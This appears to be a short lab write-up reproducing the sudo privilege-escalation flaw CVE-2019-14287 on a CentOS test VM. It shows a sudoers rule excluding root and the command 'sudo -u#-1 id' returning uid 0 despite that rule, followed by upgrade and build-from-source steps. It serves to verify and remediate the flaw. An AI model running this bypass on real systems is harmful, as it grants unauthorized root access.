Contents
Sudo Flaw Permits Restricted Root Runas Access. sudo configured to allow a user run commands as another user with the ALL keyword using the runas command specifying the user ID -1 or 4294967295 can run commands as root even when explicitly disallowed. The PAM session will not run for the command. This vulnerability is assigned as CVE-2019-14287 and affects sudo versions prior to 1.8.28. There are a couple of examples that may be found; however, wanted to see this in action on a CentOS 7.6 with sudo-1.8.23-3.el7.x86_64 (1.8.23).
The Setup
Create a user user1 and add user to sudoers restricting access to the id command as root user.
/etc/sudoers.d/user1.conf
user1 ALL=(ALL, !root) /usr/bin/id
sudo Tests
sudo as user1 and run the commands.
[user1@centos7 root]$ sudo id Sorry, user user1 is not allowed to execute '/bin/id' as root on centos7.example.com. [user1@centos7 root]$ sudo -u#0 id Sorry, user user1 is not allowed to execute '/bin/id' as root on centos7.example.com. [user1@centos7 root]$ sudo -u#-1 id uid=0(root) gid=1017(user1) groups=1017(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 [user1@centos7 root]$ sudo -u#-1 id -u 0
Resolution
Update sudo to 1.8.28. There is no RPM at the time of this writing. The latest version falls well short of 1.8.28. Alternately, build from source. Not completely tested and create a snapshot of the VM prior to completing this task.
wget ftp://ftp.sudo.ws/pub/sudo/sudo-1.8.28.tar.gz tar xzvf sudo-1.8.28.tar.gz cd sudo-1.8.28 ./configure make make install
Source(s)
- https://www.sudo.ws/alerts/minus_1_uid.html
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
- https://www.sudo.ws/install.html